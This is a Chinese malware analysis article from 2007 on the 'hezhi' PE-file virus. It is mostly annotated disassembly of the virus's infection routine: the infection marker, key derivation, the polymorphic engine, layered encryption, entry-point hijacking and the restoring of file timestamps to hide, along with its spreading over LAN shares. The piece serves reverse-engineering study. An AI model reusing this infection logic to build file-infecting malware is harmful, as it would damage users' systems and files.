hezhi病毒分析报告-网络安全专区

hezhi病毒分析报告

作者：haiwei/CVC.GB 编辑：李莲 2007-06-22 19:25

001364D0 68 04010000 PUSH 104
001364D5 8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]
001364DB 50 PUSH EAX
001364DC 6A 00 PUSH 0
001364DE FF97 912A0000 CALL DWORD PTR DS:[EDI+2A91]
001364E4 8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]
001364EA 50 PUSH EAX
001364EB 6A 01 PUSH 1
001364ED 68 03001F00 PUSH 1F0003
001364F2 FF97 952A0000 CALL DWORD PTR DS:[EDI+2A95] \\OpenEvent
001364F8 8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX
001364FE 83F8 00 CMP EAX,0
00136501 74 0C JE SHORT 0013650F \\如果当前没有DELPHI事件则跳
\\这个跳转非常关键
\\它决定是走病毒流程还是原宿主程序的流程
00136503 50 PUSH EAX
00136504 FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79]
0013650A E9 AF2B0000 JMP 001390BE
0013650F 8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]
00136515 50 PUSH EAX
00136516 6A 01 PUSH 1
00136518 6A 00 PUSH 0
0013651A 6A 00 PUSH 0
0013651C FF97 992A0000 CALL DWORD PTR DS:[EDI+2A99] \\CreateEvent 创建一个名为"DELPHI"的事件
00136522 8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX
00136528 57 PUSH EDI
00136529 8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]
0013652F 50 PUSH EAX
00136530 FF97 ED2A0000 CALL DWORD PTR DS:[EDI+2AED]
00136536 5F POP EDI
00136537 8D87 60290000 LEA EAX,DWORD PTR DS:[EDI+2960]
0013653D 50 PUSH EAX
0013653E 8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]
00136544 50 PUSH EAX
00136545 6A 00 PUSH 0
00136547 6A 00 PUSH 0
00136549 6A 20 PUSH 20
0013654B 6A 00 PUSH 0
0013654D 6A 00 PUSH 0
0013654F 6A 00 PUSH 0
00136551 FF97 CD2A0000 CALL DWORD PTR DS:[EDI+2ACD] \\\\GetCommandLine
00136557 50 PUSH EAX
00136558 8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]
0013655E 50 PUSH EAX
0013655F FF97 852A0000 CALL DWORD PTR DS:[EDI+2A85] \\CreateProcess 自身全路径名
00136565 E8 00000000 CALL 0013656A
0013656A 58 POP EAX
0013656B 60 PUSHAD
0013656C 8D88 32000000 LEA ECX,DWORD PTR DS:[EAX+32] \\这是一个变相的SEH安装
00136572 51 PUSH ECX
00136573 66:8CDA MOV DX,DS
00136576 0FA0 PUSH FS
00136578 1F POP DS
00136579 BB 00000000 MOV EBX,0
0013657E FF33 PUSH DWORD PTR DS:[EBX]
00136580 8BEC MOV EBP,ESP
00136582 892B MOV DWORD PTR DS:[EBX],EBP
00136584 66:8EDA MOV DS,DX
00136587 57 PUSH EDI
00136588 FF97 E52A0000 CALL DWORD PTR DS:[EDI+2AE5]
0013658E 5F POP EDI
0013658F 57 PUSH EDI
00136590 6A 01 PUSH 1
00136592 50 PUSH EAX
00136593 FF97 E92A0000 CALL DWORD PTR DS:[EDI+2AE9] \\这里会产生异常
00136599 5F POP EDI
0013659A EB 0F JMP SHORT 001365AB
0013659C 33DB XOR EBX,EBX \\这里F2下断点,F9,shift+F9
0013659E 66:8CDA MOV DX,DS
001365A1 0FA0 PUSH FS
001365A3 1F POP DS
001365A4 8B03 MOV EAX,DWORD PTR DS:[EBX]
001365A6 66:8EDA MOV DS,DX
001365A9 8B20 MOV ESP,DWORD PTR DS:[EAX]
001365AB 33DB XOR EBX,EBX
001365AD 66:8CDA MOV DX,DS

8.枚举局域网共享资源,并感染之

9.查找C-Z的固定磁盘,
a.其中包含:RUNDLL32\RUNONCE\RAV\LSASS\SERVICES\WINLOGON\SPOOLSV
MSTASK\RPCSS\AVCONSOL字符串的文件不感染.
b.小于8K的文件不感染.
c.系统目录下的文件不感染.

10当找到一个EXE文件时,首先判断是否是合法的PE文件,然生判断是否是已经感染文件
(以PE文件结构中的TimeDateStamp+1处的两个字节是否等于C354H来判断),如果
等于则继续下一个文件.否则转11

11.具体的感染过程如下:(由于是在最后一次解密后DUMP出来的,所以地址跟OD中的不一样
但指令和代码功能是一样的)
另:加密病毒代码和原宿主程序代码的Key由原宿主程序TimeDateStamp算得

00412A60 66:837E 5C 02 CMP WORD PTR DS:[ESI+5C],2 \\WINDOWS系统
00412A65 0F85 7F040000 JNZ CLSPACK.00412EEA
00412A6B 8B46 08 MOV EAX,DWORD PTR DS:[ESI+8] \\TimeDateStamp
00412A6E 83F8 00 CMP EAX,0
00412A71 75 21 JNZ SHORT CLSPACK.00412A94 \\在TimeDataStamp不为0的情况下用它用密钥,否则用E4C3542D为密钥
00412A73 B8 2D54C3E4 MOV EAX,E4C3542D \\密钥呀 E4C3542D
00412A78 C787 7F100000 CA>MOV DWORD PTR DS:[EDI+107F],2ACA
00412A82 C787 85100000 7C>MOV DWORD PTR DS:[EDI+1085],67C
00412A8C 8946 08 MOV DWORD PTR DS:[ESI+8],EAX
00412A8F E9 C3000000 JMP CLSPACK.00412B57
00412A94 8987 AA300000 MOV DWORD PTR DS:[EDI+30AA],EAX \\下面这段关键呀

00412A9A 50 PUSH EAX
00412A9B 53 PUSH EBX
00412A9C 35 DF6A45D3 XOR EAX,D3456ADF \\D3456ADF
00412AA1 8987 4A100000 MOV DWORD PTR DS:[EDI+104A],EAX
00412AA7 BB FFFAFFFF MOV EBX,-501
00412AAC 2BD8 SUB EBX,EAX
00412AAE 899F 50100000 MOV DWORD PTR DS:[EDI+1050],EBX
00412AB4 5B POP EBX
00412AB5 58 POP EAX
00412AB6 53 PUSH EBX
00412AB7 51 PUSH ECX
00412AB8 E8 FB060000 CALL CLSPACK.004131B8 \\\(TimeDateStamp*0x7FFFFFFF+1)%-5=EAX
其中TimeDataStamp为EAX
00412ABD 8BD8 MOV EBX,EAX
00412ABF C1EB 08 SHR EBX,8
00412AC2 50 PUSH EAX
00412AC3 53 PUSH EBX
00412AC4 51 PUSH ECX
00412AC5 52 PUSH EDX
00412AC6 8BC3 MOV EAX,EBX
00412AC8 8BCB MOV ECX,EBX
00412ACA 25 FF000000 AND EAX,0FF
00412ACF 50 PUSH EAX \\这段代码应该是变形引擎的随机数选择段
00412AD0 C1E8 04 SHR EAX,4
00412AD3 24 07 AND AL,7
00412AD5 3C 05 CMP AL,5
00412AD7 76 02 JBE SHORT CLSPACK.00412ADB
00412AD9 2C 02 SUB AL,2
00412ADB 8AD8 MOV BL,AL
00412ADD 58 POP EAX
00412ADE 24 07 AND AL,7
00412AE0 3C 05 CMP AL,5
00412AE2 76 02 JBE SHORT CLSPACK.00412AE6
00412AE4 2C 04 SUB AL,4
00412AE6 38D8 CMP AL,BL
00412AE8 75 34 JNZ SHORT CLSPACK.00412B1E
00412AEA 8BD9 MOV EBX,ECX
00412AEC C1EB 08 SHR EBX,8
00412AEF 8BC3 MOV EAX,EBX
00412AF1 25 FF000000 AND EAX,0FF
00412AF6 50 PUSH EAX
00412AF7 C1E8 04 SHR EAX,4
00412AFA 24 07 AND AL,7
00412AFC 3C 05 CMP AL,5
00412AFE 76 02 JBE SHORT CLSPACK.00412B02
00412B00 2C 02 SUB AL,2
00412B02 8AD8 MOV BL,AL
00412B04 58 POP EAX
00412B05 24 07 AND AL,7
00412B07 3C 05 CMP AL,5
00412B09 76 02 JBE SHORT CLSPACK.00412B0D
00412B0B 2C 04 SUB AL,4
00412B0D 38D8 CMP AL,BL
00412B0F 75 0D JNZ SHORT CLSPACK.00412B1E
00412B11 3C 05 CMP AL,5
00412B13 74 04 JE SHORT CLSPACK.00412B19
00412B15 FEC3 INC BL
00412B17 EB 05 JMP SHORT CLSPACK.00412B1E
00412B19 80E2 03 AND DL,3
00412B1C 8ADA MOV BL,DL
00412B1E 83E0 07 AND EAX,7
00412B21 83E3 07 AND EBX,7
00412B24 83E1 07 AND ECX,7
00412B27 E8 6C050000 CALL CLSPACK.00413098 \\这个CALL根椐上面产生的随机数产生随机代码,(里面包含一张表)
00412B2C 5A POP EDX
00412B2D 59 POP ECX
00412B2E 5B POP EBX
00412B2F 58 POP EAX
00412B30 81E3 FF0F0000 AND EBX,0FFF
00412B36 899F 7F100000 MOV DWORD PTR DS:[EDI+107F],EBX
00412B3C B9 46310000 MOV ECX,3146
00412B41 2BCB SUB ECX,EBX
00412B43 898F 85100000 MOV DWORD PTR DS:[EDI+1085],ECX
00412B49 59 POP ECX
00412B4A 5B POP EBX
00412B4B 8987 8F100000 MOV DWORD PTR DS:[EDI+108F],EAX
00412B51 66:C746 09 54C3 MOV WORD PTR DS:[ESI+9],0C354 \\写入感染标志,这个位置为PE文件的TimeDateStamp处
00412B57 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] \\原AddressOfEntryPoint
00412B5A 8987 5F060000 MOV DWORD PTR DS:[EDI+65F],EAX \\呵呵,在解密后的病毒+65F处可以看见
可爱的入口地址
00412B60 8B46 38 MOV EAX,DWORD PTR DS:[ESI+38] \\SectionAlignment
00412B63 8987 942E0000 MOV DWORD PTR DS:[EDI+2E94],EAX
00412B69 8B46 34 MOV EAX,DWORD PTR DS:[ESI+34] \\ImageBase
00412B6C 8987 B2300000 MOV DWORD PTR DS:[EDI+30B2],EAX
00412B72 8D5E 18 LEA EBX,DWORD PTR DS:[ESI+18] \\Magic
00412B75 33D2 XOR EDX,EDX
00412B77 66:8B56 14 MOV DX,WORD PTR DS:[ESI+14] \\SizeOfOptionHeader
00412B7B 03DA ADD EBX,EDX \\EBX->第一个节表
00412B7D 33C9 XOR ECX,ECX
00412B7F 66:8B4E 06 MOV CX,WORD PTR DS:[ESI+6] \\NumberOfSections
00412B83 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] \\AddressofEntryPoint
00412B86 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] \\VirtualAddress
00412B89 3BC2 CMP EAX,EDX
00412B8B 72 07 JB SHORT CLSPACK.00412B94 \\如果AddressOfEntryPoint<VirtualAddress则转下一个节
00412B8D 0353 08 ADD EDX,DWORD PTR DS:[EBX+8] \\VirtualSize
00412B90 3BC2 CMP EAX,EDX
00412B92 76 18 JBE SHORT CLSPACK.00412BAC \\如果入口点在当前节中则跳
00412B94 83C3 28 ADD EBX,28
00412B97 ^E2 EA LOOPD SHORT CLSPACK.00412B83
00412B99 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412BA0 74 05 JE SHORT CLSPACK.00412BA7
00412BA2 E9 43030000 JMP CLSPACK.00412EEA
00412BA7 E9 F5190000 JMP CLSPACK.004145A1
00412BAC 50 PUSH EAX
00412BAD 52 PUSH EDX
00412BAE 05 00020000 ADD EAX,200
00412BB3 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] \\VirtualAddress
00412BB6 0353 10 ADD EDX,DWORD PTR DS:[EBX+10] \\SizeOfRawData
00412BB9 3BC2 CMP EAX,EDX
00412BBB 5A POP EDX
00412BBC 58 POP EAX
00412BBD 77 24 JA SHORT CLSPACK.00412BE3
00412BBF 50 PUSH EAX
00412BC0 0346 34 ADD EAX,DWORD PTR DS:[ESI+34] \\ImageBase
00412BC3 8987 18060000 MOV DWORD PTR DS:[EDI+618],EAX \\ImageBase+AddressOfEntryPoint
00412BC9 8B43 24 MOV EAX,DWORD PTR DS:[EBX+24] \\Characteristics
00412BCC 0D 00000020 OR EAX,20000000 \\IMAGE_SCN_MEM_EXECUTE
00412BD1 8943 24 MOV DWORD PTR DS:[EBX+24],EAX \\写回
00412BD4 58 POP EAX \\AddressOfEntryPoint
00412BD5 2B43 0C SUB EAX,DWORD PTR DS:[EBX+C] \\EAX-VirtualAddress
00412BD8 0343 14 ADD EAX,DWORD PTR DS:[EBX+14] \\PointerToRawData
00412BDB 8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX \\EAX->FileOffset
00412BE1 EB 2F JMP SHORT CLSPACK.00412C12
00412BE3 50 PUSH EAX
00412BE4 52 PUSH EDX
00412BE5 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C]
00412BE8 8956 28 MOV DWORD PTR DS:[ESI+28],EDX
00412BEB 0356 34 ADD EDX,DWORD PTR DS:[ESI+34]
00412BEE 8997 18060000 MOV DWORD PTR DS:[EDI+618],EDX
00412BF4 8B43 24 MOV EAX,DWORD PTR DS:[EBX+24]
00412BF7 0D 00000020 OR EAX,20000000
00412BFC 8943 24 MOV DWORD PTR DS:[EBX+24],EAX
00412BFF 5A POP EDX
00412C00 58 POP EAX
00412C01 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
00412C04 8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX
00412C0A 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX
00412C10 EB 79 JMP SHORT CLSPACK.00412C8B
00412C12 8D5E 18 LEA EBX,DWORD PTR DS:[ESI+18] \\ESI->''PE''
00412C15 33D2 XOR EDX,EDX
00412C17 66:8B56 14 MOV DX,WORD PTR DS:[ESI+14]
00412C1B 03DA ADD EBX,EDX \\EBX->.text
00412C1D 33C9 XOR ECX,ECX
00412C1F 66:8B4E 06 MOV CX,WORD PTR DS:[ESI+6] \\NumberOfSections
00412C23 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10] \\SizeOfRawData
00412C26 2B43 08 SUB EAX,DWORD PTR DS:[EBX+8] \\VirtualSize
00412C29 3B87 AE300000 CMP EAX,DWORD PTR DS:[EDI+30AE] \\CMP EAX,200
00412C2F 7D 37 JGE SHORT CLSPACK.00412C68
00412C31 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28]
00412C34 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C]
00412C37 3BC2 CMP EAX,EDX
00412C39 72 07 JB SHORT CLSPACK.00412C42
00412C3B 0353 08 ADD EDX,DWORD PTR DS:[EBX+8]
00412C3E 3BC2 CMP EAX,EDX
00412C40 76 18 JBE SHORT CLSPACK.00412C5A
00412C42 83C3 28 ADD EBX,28
00412C45 ^E2 DC LOOPD SHORT CLSPACK.00412C23
00412C47 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412C4E 74 05 JE SHORT CLSPACK.00412C55
00412C50 E9 95020000 JMP CLSPACK.00412EEA
00412C55 E9 47190000 JMP CLSPACK.004145A1
00412C5A 2B43 0C SUB EAX,DWORD PTR DS:[EBX+C]
00412C5D 0343 14 ADD EAX,DWORD PTR DS:[EBX+14]
00412C60 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX //EPOFileOffset
00412C66 EB 23 JMP SHORT CLSPACK.00412C8B
00412C68 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
00412C6B 0343 08 ADD EAX,DWORD PTR DS:[EBX+8]
00412C6E 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX
00412C74 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]
00412C77 0343 08 ADD EAX,DWORD PTR DS:[EBX+8]
00412C7A 8946 28 MOV DWORD PTR DS:[ESI+28],EAX
00412C7D 50 PUSH EAX
00412C7E 8B43 08 MOV EAX,DWORD PTR DS:[EBX+8]
00412C81 0387 AE300000 ADD EAX,DWORD PTR DS:[EDI+30AE]
00412C87 8943 08 MOV DWORD PTR DS:[EBX+8],EAX
00412C8A 58 POP EAX
00412C8B 83C3 28 ADD EBX,28
00412C8E ^E2 FB LOOPD SHORT CLSPACK.00412C8B \\定位到最后一个节上
00412C90 83EB 28 SUB EBX,28
00412C93 C743 24 400000C0 MOV DWORD PTR DS:[EBX+24],C0000040 \\改节属性
00412C9A 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10] \\SizeOfRawData
00412C9D 50 PUSH EAX
00412C9E 0343 0C ADD EAX,DWORD PTR DS:[EBX+C] \\VirtualAddress
00412CA1 0346 34 ADD EAX,DWORD PTR DS:[ESI+34] \\Image
00412CA4 51 PUSH ECX
00412CA5 8A4E 08 MOV CL,BYTE PTR DS:[ESI+8] \\TimeDateStamp
00412CA8 80E1 1F AND CL,1F
00412CAB 888F 8B100000 MOV BYTE PTR DS:[EDI+108B],CL
00412CB1 D3C8 ROR EAX,CL
00412CB3 59 POP ECX
00412CB4 8987 7A100000 MOV DWORD PTR DS:[EDI+107A],EAX \\020CA000H
00412CBA B9 00320000 MOV ECX,3200
00412CBF 014B 10 ADD DWORD PTR DS:[EBX+10],ECX \\把最后一节大小加3200H
00412CC2 014E 20 ADD DWORD PTR DS:[ESI+20],ECX \\SizeOfinitializeData+3200H
00412CC5 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]
00412CC8 3B43 08 CMP EAX,DWORD PTR DS:[EBX+8]
00412CCB 76 03 JBE SHORT CLSPACK.00412CD0
00412CCD 8943 08 MOV DWORD PTR DS:[EBX+8],EAX
00412CD0 05 FF0F0000 ADD EAX,0FFF
00412CD5 25 00F0FFFF AND EAX,FFFFF000
00412CDA 0343 0C ADD EAX,DWORD PTR DS:[EBX+C]
00412CDD 8946 50 MOV DWORD PTR DS:[ESI+50],EAX \\SizeOfImage
00412CE0 52 PUSH EDX
00412CE1 8B53 08 MOV EDX,DWORD PTR DS:[EBX+8]
00412CE4 0353 0C ADD EDX,DWORD PTR DS:[EBX+C]
00412CE7 3BC2 CMP EAX,EDX
00412CE9 73 03 JNB SHORT CLSPACK.00412CEE
00412CEB 8956 50 MOV DWORD PTR DS:[ESI+50],EDX
00412CEE 5A POP EDX
00412CEF 5A POP EDX
00412CF0 0353 14 ADD EDX,DWORD PTR DS:[EBX+14]
00412CF3 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88] \\hFile
00412CF9 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412D00 75 05 JNZ SHORT CLSPACK.00412D07
00412D02 E9 75170000 JMP CLSPACK.0041447C
00412D07 51 PUSH ECX
00412D08 52 PUSH EDX
00412D09 6A 00 PUSH 0
00412D0B 53 PUSH EBX
00412D0C FF97 B12A0000 CALL DWORD PTR DS:[EDI+2AB1] \\GetFileSize
00412D12 5A POP EDX
00412D13 59 POP ECX
00412D14 83F8 00 CMP EAX,0
00412D17 0F84 CD010000 JE CLSPACK.00412EEA
00412D1D 8BDA MOV EBX,EDX
00412D1F 81C3 00020000 ADD EBX,200
00412D25 3BC3 CMP EAX,EBX
00412D27 0F87 BD010000 JA CLSPACK.00412EEA \\不符合感染条件则跳(空间不够大)
00412D2D 60 PUSHAD
00412D2E 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D34 6A 00 PUSH 0
00412D36 6A 00 PUSH 0
00412D38 8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]
00412D3E 52 PUSH EDX
00412D3F 53 PUSH EBX
00412D40 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89] \\SetFilePointer
00412D46 83F8 00 CMP EAX,0
00412D49 61 POPAD
00412D4A 0F84 9A010000 JE CLSPACK.00412EEA
00412D50 60 PUSHAD
00412D51 6A 00 PUSH 0
00412D53 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412D59 50 PUSH EAX
00412D5A B8 04020000 MOV EAX,204
00412D5F 50 PUSH EAX
00412D60 8D87 A62E0000 LEA EAX,DWORD PTR DS:[EDI+2EA6]
00412D66 50 PUSH EAX
00412D67 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D6D 53 PUSH EBX
00412D6E FF97 9D2A0000 CALL DWORD PTR DS:[EDI+2A9D] \\ReadFileA
00412D74 83F8 00 CMP EAX,0
00412D77 61 POPAD
00412D78 0F84 6C010000 JE CLSPACK.00412EEA
00412D7E 83BF A6300000 00 CMP DWORD PTR DS:[EDI+30A6],0
00412D85 75 0A JNZ SHORT CLSPACK.00412D91
00412D87 C787 A6300000 6A>MOV DWORD PTR DS:[EDI+30A6],23EDA56A
00412D91 60 PUSHAD
00412D92 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D98 6A 00 PUSH 0
00412D9A 6A 00 PUSH 0
00412D9C 8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]
00412DA2 52 PUSH EDX
00412DA3 53 PUSH EBX
00412DA4 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89] \\SetFilePointer
00412DAA 83F8 00 CMP EAX,0
00412DAD 61 POPAD
00412DAE 0F84 36010000 JE CLSPACK.00412EEA
00412DB4 60 PUSHAD
00412DB5 6A 00 PUSH 0
00412DB7 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412DBD 50 PUSH EAX
00412DBE B8 00020000 MOV EAX,200
00412DC3 50 PUSH EAX
00412DC4 8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]
00412DCA 50 PUSH EAX
00412DCB 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412DD1 53 PUSH EBX
00412DD2 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D] \\WriteFileA
00412DD8 83F8 00 CMP EAX,0
00412DDB 61 POPAD
00412DDC 0F84 08010000 JE CLSPACK.00412EEA
00412DE2 E8 F5030000 CALL CLSPACK.004131DC \\Xor [ESI],EAX len=1FCH
00412DE7 E8 21050000 CALL CLSPACK.0041330D \\ROR EAX,10H len=BF5H
00412DEC E8 3B050000 CALL CLSPACK.0041332C \\这里是五层加密的地方
00412DF1 E8 F9040000 CALL CLSPACK.004132EF
00412DF6 E8 C3040000 CALL CLSPACK.004132BE \\跟前面的五次解密顺序相反
00412DFB 60 PUSHAD
00412DFC E8 92030000 CALL CLSPACK.00413193
00412E01 61 POPAD
00412E02 60 PUSHAD
00412E03 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E09 6A 00 PUSH 0
00412E0B 6A 00 PUSH 0
00412E0D 52 PUSH EDX
00412E0E 53 PUSH EBX
00412E0F FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412E15 83F8 00 CMP EAX,0
00412E18 61 POPAD
00412E19 0F84 CB000000 JE CLSPACK.00412EEA
00412E1F 60 PUSHAD
00412E20 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E26 6A 00 PUSH 0
00412E28 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412E2E 50 PUSH EAX
00412E2F 51 PUSH ECX
00412E30 8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]
00412E36 50 PUSH EAX
00412E37 53 PUSH EBX
00412E38 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412E3E 83F8 00 CMP EAX,0
00412E41 61 POPAD
00412E42 0F84 A2000000 JE CLSPACK.00412EEA
00412E48 60 PUSHAD
00412E49 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E4F 6A 00 PUSH 0
00412E51 6A 00 PUSH 0
00412E53 FFB7 902E0000 PUSH DWORD PTR DS:[EDI+2E90]
00412E59 53 PUSH EBX
00412E5A FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412E60 83F8 00 CMP EAX,0
00412E63 61 POPAD
00412E64 0F84 80000000 JE CLSPACK.00412EEA
00412E6A 60 PUSHAD
00412E6B 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E71 6A 00 PUSH 0
00412E73 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412E79 , ; 50 PUSH EAX
00412E7A 68 00040000 PUSH 400
00412E7F 8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]
00412E85 50 PUSH EAX
00412E86 53 PUSH EBX
00412E87 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412E8D 83F8 00 CMP EAX,0
00412E90 61 POPAD
00412E91 74 57 JE SHORT CLSPACK.00412EEA
00412E93 60 PUSHAD
00412E94 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E9A 6A 00 PUSH 0
00412E9C 6A 00 PUSH 0
00412E9E FFB7 8C2E0000 PUSH DWORD PTR DS:[EDI+2E8C]
00412EA4 53 PUSH EBX
00412EA5 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412EAB 83F8 00 CMP EAX,0
00412EAE 61 POPAD
00412EAF 74 39 JE SHORT CLSPACK.00412EEA
00412EB1 E8 0A050000 CALL CLSPACK.004133C0
00412EB6 E8 D20C0000 CALL CLSPACK.00413B8D
00412EBB E8 35030000 CALL CLSPACK.004131F5
00412EC0 60 PUSHAD
00412EC1 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412EC7 6A 00 PUSH 0
00412EC9 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412ECF 50 PUSH EAX
00412ED0 FFB7 AE300000 PUSH DWORD PTR DS:[EDI+30AE]
00412ED6 8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]
00412EDC 50 PUSH EAX
00412EDD 53 PUSH EBX
00412EDE FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412EE4 83F8 00 CMP EAX,0
00412EE7 61 POPAD
00412EE8 74 00 JE SHORT CLSPACK.00412EEA
00412EEA 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412EF0 83E8 2C SUB EAX,2C
00412EF3 83C0 14 ADD EAX,14
00412EF6 50 PUSH EAX
00412EF7 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412EFD 83E8 2C SUB EAX,2C
00412F00 83C0 0C ADD EAX,0C
00412F03 50 PUSH EAX
00412F04 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412F0A 83E8 2C SUB EAX,2C
00412F0D 83C0 04 ADD EAX,4
00412F10 50 PUSH EAX
00412F11 FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]
00412F17 FF97 B52A0000 CALL DWORD PTR DS:[EDI+2AB5]
00412F1D FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]
00412F23 FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79] \\SetFileTime 恢复文件时间,防止被发现
00412F29 81BF 412B0000 88>CMP DWORD PTR DS:[EDI+2B41],88888888
00412F33 74 17 JE SHORT CLSPACK.00412F4C
00412F35 81BF 4D2B0000 CC>CMP DWORD PTR DS:[EDI+2B4D],CCCCCCCC
00412F3F 74 0B JE SHORT CLSPACK.00412F4C
00412F41 68 00100000 PUSH 1000
00412F46 FF97 A92A0000 CALL DWORD PTR DS:[EDI+2AA9] \\Sleep
00412F4C FFB7 842E0000 PUSH DWORD PTR DS:[EDI+2E84]
00412F52 FFB7 B4290000 PUSH DWORD PTR DS:[EDI+29B4]
00412F58 FF97 A12A0000 CALL DWORD PTR DS:[EDI+2AA1] \\SetFileAttrubutes 恢复文件属性
00412F5E 5E POP ESI
00412F5F C3 RETN

12.则解密原宿主程序代码(总共200字节),
恢复原AddressOfEntryPoint,执行原程序.
http://www.hack58.net/Article/60/64/2006/8060.htm

第1页：hezhi病毒分析报告第2页：hezhi病毒分析报告

关注我们